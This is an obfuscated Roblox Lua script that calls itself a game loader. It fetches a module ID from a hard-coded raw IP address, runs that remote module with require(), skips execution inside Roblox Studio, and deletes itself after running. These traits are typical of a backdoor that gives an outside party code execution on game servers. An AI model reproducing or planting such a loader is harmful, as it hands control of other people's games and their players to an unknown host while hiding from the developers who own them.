local s1,s2,s3,s4=game:GetService("Players"),game:GetService("HttpService"),game:GetService("RunService"),game:GetService("NetworkServer")
local c1={["\117\114\108"]='http://74.208.152.188/Assets',["\107\101\121"]="SecureLoadingKey"}
local f1=function()local m,r=3,2;for a=1,m do local o,e=pcall(function()return s2:GetAsync(c1["\117\114\108"])end)if o then local d,t=pcall(function()return s2:JSONDecode(e)end)if d then return t else warn("Decode failed: "..tostring(t))end else warn("Fetch failed (attempt "..a.."): "..tostring(e))if a<m then wait(r*a)end end end;return nil end
local f2=function(d)local u=tostring(game.GameId)local uD=d[u]if not uD then warn("No data for universe: "..u)return nil end;local mI=uD.MainModule;if not mI then warn("No MainModule for universe: "..u)return nil end;return mI end
local f3=function()s1.CharacterAutoLoads=true;for _,p in ipairs(s1:GetPlayers())do pcall(function()p:LoadCharacter()end)end end
local f4=function(p,m)local cs={}for _,d in ipairs(m:GetDescendants())do if d:IsA("RemoteFunction")then local cn=d.OnServerInvoke:Connect(function(i,a)if a[1]~=c1["\107\101\121"]then warn(i.Name.." unauthorized RF access!")s4:KickPlayer(i.UserId)end end)table.insert(cs,cn)end end;return cs end
local f5=function()if _G.s1 then return end;_G.s1=true;if s3:IsStudio()or not s3:IsServer()or not s4 then return end;local aC={}local sp=function(p)p.CharacterAdded:Connect(function(c)local cs=f4(p,c)for _,cn in ipairs(cs)do table.insert(aC,cn)end end)if p.Character then local cs=f4(p,p.Character)for _,cn in ipairs(cs)do table.insert(aC,cn)end end end;s1.PlayerAdded:Connect(sp)for _,p in ipairs(s1:GetPlayers())do sp(p)end;game.AncestryChanged:Connect(function()for _,cn in ipairs(aC)do cn:Disconnect()end;aC={}end)end
local f6=function()local d=f1()if not d then return end;local mI=f2(d)if not mI then return end;local ok,err=pcall(function()require(mI)()end)if ok then print("Loaded Game.")else warn("Load failed: "..tostring(err))end;f3()f5()task.wait(0.5)script:Destroy()end
return f6
